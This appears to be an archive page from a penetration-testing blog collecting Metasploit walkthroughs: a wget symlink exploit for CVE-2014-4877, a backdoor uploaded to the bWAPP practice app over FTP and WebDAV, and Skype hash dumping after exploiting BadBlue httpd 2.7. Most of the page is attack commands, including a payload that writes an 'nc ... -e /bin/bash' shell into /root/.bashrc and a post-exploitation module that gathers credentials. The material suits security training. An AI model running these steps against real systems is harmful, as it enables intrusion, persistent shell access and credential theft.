Archive | Metasploit RSS feed for this section

Wget Exploit Demonstration: CVE-2014-4877

msf > use auxiliary/server/wget_symlink_file_write
msf auxiliary(wget_symlink_file_write) > show options
msf auxiliary(wget_symlink_file_write) > set TARGET_FILE /root/.bashrc
msf auxiliary(wget_symlink_file_write) > set TARGET_DATA nc localhost 2222 -e /bin/bash &
msf auxiliary(wget_symlink_file_write) > exploit
nc -lvp 2222
wget -m

bWAPP: Abusing FTP and WebDav – Uploading Shell

The video shows how to exploit bWAPP through FTP and Webdav using metasploit framework. Here are the steps:

  • First run nmap and closely verify all the services
  • Run Metasploit Framework and exploit webdav and enable it
  • Run FTP and login and upload your backdoor
  • Access your backdoor through web browser and get reverse shell
# msfconsole
msf > search ftp_login
msf > auxiliary/scanner/ftp/ftp_login
msf auxiliary(ftp_login) > show options
msf auxiliary(ftp_login) > set USERNAME anonymous
msf auxiliary(ftp_login) > show options
msf auxiliary(ftp_login) > set RHOSTS
msf auxiliary(ftp_login) > exploit

msf auxiliary(ftp_login) > search webdav_scanner
msf auxiliary(ftp_login) > use auxiliary/scanner/http/webdav_scanner
msf auxiliary(webdav_scanner) > show options
msf auxiliary(webdav_scanner) > set RHOSTS
msf auxiliary(webdav_scanner) > set PATH /webdav/
msf auxiliary(webdav_scanner) > exploit

# ftp
ftp> o
Name ( anonymous

ftp> ls
ftp> put backdoor.php

backdoor.php code:




Address Bar:


Post Exploitation: Dump Skype Hash with Metasploit using BadBlue httpd 2.7

The video shows how to dump Skype hashes using metasploit framework and the BadBlue httpd 2.7. Here are the steps:

  • Exploiting Windows 8 Machine using BadBlue httpd 2.7
  • Use Post Exploitation Skype module to dump the hashes
  • Crack MD5 hashes, as you will not get a plain text password(s)
nmap -sS -sV

msf> use exploit/windows/http/badblue_passthru
msf exploit(badblue_passthru) > set RHOST
msf exploit(badblue_passthru) > exploit

meterpreter > sysinfo
meterpreter > ipconfig
meterpreter > background

msf exploit(badblue_passthru) > search skype
msf exploit(badblue_passthru) > use post/windows/gather/credentials/skype

msf post(skype) > set SESSION 2
msf post(skype) > exploit